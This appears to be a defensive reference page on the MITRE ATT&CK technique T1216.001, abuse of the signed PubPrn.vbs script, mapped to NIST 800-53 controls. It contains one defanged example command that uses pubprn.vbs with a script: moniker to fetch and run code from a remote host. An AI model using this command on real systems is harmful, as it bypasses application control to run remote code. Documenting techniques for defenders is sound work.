Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.
<code>PubPrn.vbs</code> is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is <code>cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png</code>.
View in MITRE ATT&CK®| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name |
|---|---|---|---|---|
| CM-2 | Baseline Configuration | Protects | T1216.001 | PubPrn |
| CM-6 | Configuration Settings | Protects | T1216.001 | PubPrn |
| CM-7 | Least Functionality | Protects | T1216.001 | PubPrn |
| SI-10 | Information Input Validation | Protects | T1216.001 | PubPrn |
| SI-4 | System Monitoring | Protects | T1216.001 | PubPrn |
| SI-7 | Software, Firmware, and Information Integrity | Protects | T1216.001 | PubPrn |
| action.hacking.variety.Abuse of functionality | Abuse of functionality | related-to | T1216.001 | Signed Script Proxy Execution: PubPrn |